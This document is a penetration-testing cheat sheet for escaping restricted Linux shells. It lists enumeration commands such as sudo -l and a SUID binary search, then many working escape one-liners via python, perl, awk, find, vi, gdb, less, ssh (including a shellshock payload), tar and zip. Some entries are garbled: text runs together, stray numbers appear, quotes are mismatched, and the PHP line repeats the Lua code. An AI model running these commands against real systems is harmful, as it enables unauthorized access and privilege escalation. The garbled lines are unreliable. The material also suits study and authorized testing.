Enumerate

Check what commands you can use

cd
ls
id
mkdir
whoami
...

Check for piping and redirection operators

>
>>
<
|

Check for available languages

find / -name perl* 2>/dev/null
find / -name python* 2>/dev/null
find / -name ruby* 2>/dev/null
find / -name lua* 2>/dev/null
find / -name php* 2>/dev/null
find / -name go* 2>/dev/null
...

No password sudo commands

sudo -l

Check for SUID binaries

find / -perm -u=s -type f 2>/dev/null

Check current (s)hell

echo $SHELL

List environmental variables

env
printenv 

Common Escape Techniques

  • If “/” is allowed you can run /bin/sh or /bin/bash.
  • If you can run cp command you can copy the /bin/sh or /bin/bash
  • into your directory.
  • From ftp > !/bin/sh or !/bin/bash 4) From gdb > !/bin/sh or !/bin/bash
  • From more/man/less > !/bin/sh or !/bin/bash
  • Fromvim>!/bin/shor!/bin/bash
  • From rvim > :python import os; os.system(“/bin/bash ) 8) From scp > scp -S /path/yourscript x y:
  • From awk > awk ‘BEGIN {system(“/bin/sh or /bin/bash”)}’
  • From find > find / -name test -exec /bin/sh or /bin/bash \;

Command Line Escapes

python -c 'import pty; pty.spawn("/bin/sh")'
echo os.system('/bin/bash')
/bin/sh -i
perl —e 'exec "/bin/sh";'
awk ‘BEGIN {system(“/bin/sh”)}’
find / -name *.log –exec /bin/sh \;

Language Interactive Shell Escapes

Perl Shell

exec "/bin/sh";

Ruby Shell

exec "/bin/sh"

Lua Shell

os.execute('/bin/sh')

PHP Shell

os.execute('/bin/sh')

Except Shell

except spawn sh
sh

While Using a Program

IRB

exec "/bin/sh"

Vi

:!bash
# or
:set shell=/bin/bash:shell

Nmap Interactive

!sh

GDB

!/bin/sh

FTP

!/bin/sh

More/Less/Man

!/bin/sh

Advanced Techniques

  • From ssh > ssh username@IP – t “/bin/sh” or “/bin/bash”
  • From ssh2 > ssh username@IP -t “bash –noprofile”
  • From ssh3 > ssh username@IP -t “() { :; }; /bin/bash” (shellshock)
  • From ssh4 > ssh -o ProxyCommand=”sh -c /tmp/yourfile.sh” 127.0.0.1 (SUID)
  • From git > git help status > you can run it then !/bin/bash
  • From pico > pico -s “/bin/bash” then you can write /bin/bash and then CTRL + T
  • From zip > zip /tmp/test.zip /tmp/test -T –unzip-command=”sh -c /bin/bash”
  • From tar > tar cf /dev/null testfile –checkpoint=1 –checkpoint- action=exec=/bin/bash

Some commands referenced from: 44592-linux-restricted-shell-bypass-guide.pdf